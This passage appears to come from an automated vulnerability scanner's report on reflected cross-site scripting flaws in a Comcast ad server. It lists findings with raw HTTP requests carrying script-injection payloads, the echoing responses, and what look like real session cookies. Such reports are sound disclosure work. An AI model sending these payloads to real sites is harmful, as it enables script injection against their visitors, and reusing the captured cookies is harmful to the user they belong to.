<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/345184688/x32e696a"><img src=a onerror=alert(1)>850fbda351d/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.101. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3bc2"><script>alert(1)</script>e45d8e81862 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?a3bc2"><script>alert(1)</script>e45d8e81862=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 782
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
ream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/1924789161/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&a3bc2"><script>alert(1)</script>e45d8e81862=1" WIDTH=2 HEIGHT=2>

2.102. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48f11"><script>alert(1)</script>19550cf6058 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net48f11"><script>alert(1)</script>19550cf6058/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 780
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net48f11"><script>alert(1)</script>19550cf6058/com-hp/2022363852/L35/1234034443/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.103. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f69b0"><script>alert(1)</script>b11efa66307 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hpf69b0"><script>alert(1)</script>b11efa66307/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 779
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hpf69b0"><script>alert(1)</script>b11efa66307/2022363852/L35/991764332/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.104. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1313"><script>alert(1)</script>84290a6437b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852f1313"><script>alert(1)</script>84290a6437b/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 777
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852f1313"><script>alert(1)</script>84290a6437b/L35/6859924/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.105. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c22ec"><script>alert(1)</script>bf352f0d2a0 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35c22ec"><script>alert(1)</script>bf352f0d2a0/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 781
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35c22ec"><script>alert(1)</script>bf352f0d2a0/L/308597502/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.106. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aae3c"><img%20src%3da%20onerror%3dalert(1)>24f9f614caf was submitted in the REST URL parameter 9. This input was echoed as aae3c"><img src=a onerror=alert(1)>24f9f614caf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32aae3c"><img%20src%3da%20onerror%3dalert(1)>24f9f614caf/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 783
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/1484827575/x32aae3c"><img src=a onerror=alert(1)>24f9f614caf/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.107. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ace4"><script>alert(1)</script>ea98919b1f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?8ace4"><script>alert(1)</script>ea98919b1f9=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 782
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
ream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/1660234141/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&8ace4"><script>alert(1)</script>ea98919b1f9=1" WIDTH=2 HEIGHT=2>

2.108. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0a72"><script>alert(1)</script>f7f7069159a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.netb0a72"><script>alert(1)</script>f7f7069159a/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1443
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.netb0a72"><script>alert(1)</script>f7f7069159a/network/202236386/L17/628065419/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.109. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14935"%3be7e5252438c was submitted in the REST URL parameter 4. This input was echoed as 14935";e7e5252438c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net14935"%3be7e5252438c/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1395
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net14935";e7e5252438c/network/202236386/L17/1951116135/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="
...[SNIP]...

